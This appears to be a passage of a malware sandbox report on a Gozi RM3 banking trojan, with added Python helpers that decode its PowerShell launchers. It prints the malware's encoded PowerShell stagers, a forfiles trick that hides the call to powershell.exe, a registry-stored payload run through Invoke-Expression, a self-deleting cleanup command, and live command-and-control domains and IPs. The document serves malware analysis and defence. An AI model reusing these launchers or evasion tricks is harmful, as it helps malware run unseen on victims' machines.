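PID 2024 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe C:\Windows\Explorer.EXE
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
"""

# Writer image may contain spaces; the target image always starts with "C:\".
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) (C:\\.+)$")


def parse_rows(text):
    """(writer pid, target pid, writer image, target image) for each row."""
    events = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            events.append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return events


def image_of(events):
    """pid -> image basename, collected from both columns."""
    names = {}
    for src, dst, src_img, dst_img in events:
        names[src] = ntpath.basename(src_img)
        names[dst] = ntpath.basename(dst_img)
    return names


def writers_of(events, pid):
    """Distinct pids that wrote into the given target pid."""
    return {src for src, dst, _, _ in events if dst == pid}


def descendants(events, root):
    """Every pid reachable from root along write edges. Parents write into the
    children they launch, so this approximates the subtree spawned from root."""
    edges = defaultdict(set)
    for src, dst, _, _ in events:
        edges[src].add(dst)
    seen, stack = set(), [root]
    while stack:
        for child in edges[stack.pop()]:
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return seen


def targets_with_multiple_writers(events):
    """pid -> set of writers, for targets written to by more than one process."""
    writers = defaultdict(set)
    for src, dst, _, _ in events:
        writers[dst].add(src)
    return {pid: w for pid, w in writers.items() if len(w) > 1}


if __name__ == "__main__":
    ev = parse_rows(ROWS)
    names = image_of(ev)
    print("spawned under cmd.exe 1316:", sorted(descendants(ev, 1316)))
    for pid, w in targets_with_multiple_writers(ev).items():
        print(f"{names[pid]} ({pid}) written by", {p: names[p] for p in sorted(w)})
```

Running it prints the ten PIDs under the cmd.exe 1316 chain (forfiles, cmd, powershell, its two child powershells, two csc/cvtres pairs and Explorer.EXE) and reports Explorer.EXE 1252 as the one target with two writers.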

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:548 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:548 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j03_qgpn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC9C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC9B.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pibgysdr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD57.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD56.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\XQBTVE.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5
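The process list carries three base64 blobs passed to PowerShell and a forfiles invocation that never names powershell.exe. The script below is an added example, not part of the report: it decodes the `-ec` / `-E` arguments (PowerShell's -EncodedCommand takes any unambiguous prefix and expects base64 over the UTF-16LE script text) and shows why `forfiles /p C:\Windows\system32 /s /m po*l.e*e` resolves to powershell.exe without the string "powershell" ever appearing on the command line. Decoding the first blob gives `iex (gp 'HKCU:\Software\Securitycache').L`, that is, the next stage is read from a registry value and passed to Invoke-Expression; the two `-E` blobs are the small param() helpers that base64-decode and ASCII-decode it. The three command lines are copied from the report; the regexes and helper names are my own.

```python
"""Decode the encoded PowerShell arguments and the forfiles mask from the
process list. Added example: editor's code, not part of the sandbox report."""
import base64
import fnmatch
import re

# Command lines copied verbatim from the Processes section of the report.
COMMAND_LINES = [
    'forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\\Windows\\system32 /s /m po*l.e*e',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA',
]

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc ...); longest
# alternative first so "-ec" is not consumed as "-e" followed by garbage.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FORFILES_PATH = re.compile(r"/p\s+(\S+)", re.IGNORECASE)
FORFILES_MASK = re.compile(r"/m\s+(\S+)", re.IGNORECASE)
# Registry paths in PowerShell drive notation, e.g. HKCU:\Software\...
REG_KEY = re.compile(r"""HK[A-Z]{1,2}:\\[^'"\s)]+""")


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(b64).decode("utf-16-le")


def encoded_commands(cmdline):
    """Every encoded-command payload in one command line, decoded."""
    return [decode_encoded_command(b) for b in ENCODED_ARG.findall(cmdline)]


def forfiles_mask(cmdline):
    """(search root, file mask) of a forfiles invocation, or None."""
    if "forfiles" not in cmdline.lower():
        return None
    path, mask = FORFILES_PATH.search(cmdline), FORFILES_MASK.search(cmdline)
    if not (path and mask):
        return None
    return path.group(1), mask.group(1)


def matches_mask(filename, mask):
    """Case-insensitive wildcard match, the way forfiles /m selects names."""
    return fnmatch.fnmatchcase(filename.lower(), mask.lower())


def analyze(cmdlines):
    """Decode payloads, pull out referenced registry keys, and flag forfiles
    masks that select powershell.exe without naming it."""
    decoded, keys, lolbin = [], [], []
    for cmd in cmdlines:
        for script in encoded_commands(cmd):
            decoded.append(script)
            keys.extend(REG_KEY.findall(script))
        hit = forfiles_mask(cmd)
        if hit and matches_mask("powershell.exe", hit[1]):
            lolbin.append(hit)
    return {"decoded": decoded, "registry_keys": keys, "forfiles_to_powershell": lolbin}


if __name__ == "__main__":
    for key, items in analyze(COMMAND_LINES).items():
        print(key)
        for item in items:
            print("   ", item)
```

The registry key the first stage reads (HKCU:\Software\Securitycache, value L) is what to pull from the infected profile when you want the next-stage script; the report itself only records the encoded launcher.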

Network

Country  Destination            Domain            Proto
US       8.8.8.8:53             gogojoob.xyz      udp
NL       194.104.136.213:443    gogojoob.xyz      tcp
NL       194.104.136.213:443    gogojoob.xyz      tcp
NL       194.104.136.213:443    gogojoob.xyz      tcp
DE       46.20.35.116:443       -                 tcp
HK       91.245.255.40:80       91.245.255.40     tcp
US       209.141.45.189:80      209.141.45.189    tcp
US       199.249.230.69:80      199.249.230.69    tcp
JP       172.104.79.222:80      172.104.79.222    tcp
FR       163.172.139.104:8080   163.172.139.104   tcp
FR       62.210.137.233:443     62.210.137.233    tcp
ZA       160.119.249.240:80     160.119.249.240   tcp
HU       217.112.131.7:443      -                 tcp
US       199.249.230.117:80     199.249.230.117   tcp
PL       37.28.154.68:80        37.28.154.68      tcp
NL       212.83.167.220:9030    212.83.167.220    tcp
HK       91.245.255.40:80       91.245.255.40     tcp
US       74.91.21.2:80          74.91.21.2        tcp
ZA       160.119.249.240:80     -                 tcp
PL       37.28.154.68:80        -                 tcp
US       209.141.45.189:80      -                 tcp
US       8.8.8.8:53             unavas.xyz        udp
US       8.8.8.8:53             microsoft.com     udp
NL       91.242.229.120:443     unavas.xyz        tcp

Rows marked "-" had no domain recorded for the destination. Only gogojoob.xyz and unavas.xyz were resolved and then contacted over TLS; the remaining connections go straight to IP addresses in many countries on ports 80, 443, 8080 and 9030 (9030 is Tor's default directory port), which is consistent with the "Uses Tor communications" signature above.

Files

memory/2024-54-0x000000000032E000-0x0000000000339000-memory.dmp

memory/2024-55-0x000000000032E000-0x0000000000339000-memory.dmp

memory/2024-56-0x00000000002A0000-0x00000000002AC000-memory.dmp

memory/2024-57-0x0000000075AD1000-0x0000000075AD3000-memory.dmp

memory/2024-58-0x0000000001000000-0x000000000106F000-memory.dmp

memory/2024-59-0x00000000002B0000-0x00000000002C0000-memory.dmp

memory/2024-65-0x00000000002E0000-0x00000000002E2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dc390d341fe24e223448026bf2e64f2
SHA1 98da1fd3e68d5dca28ea979825ca0ead1790d3e1

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 10:24

Reported

2022-03-15 10:27

Platform

win10v2004-20220310-en

Max time kernel

158s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

Signatures

Gozi RM3

banker trojan gozi_rm3

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2015545887" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingDelete C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947423" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2016326912" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947423" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A76BC3D4-A452-11EC-B9E2-DEEE83322A32}.dat = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A76BC3D2-A452-11EC-B9E2-DEEE83322A32} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4940 CREDAT:17410 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp

Files
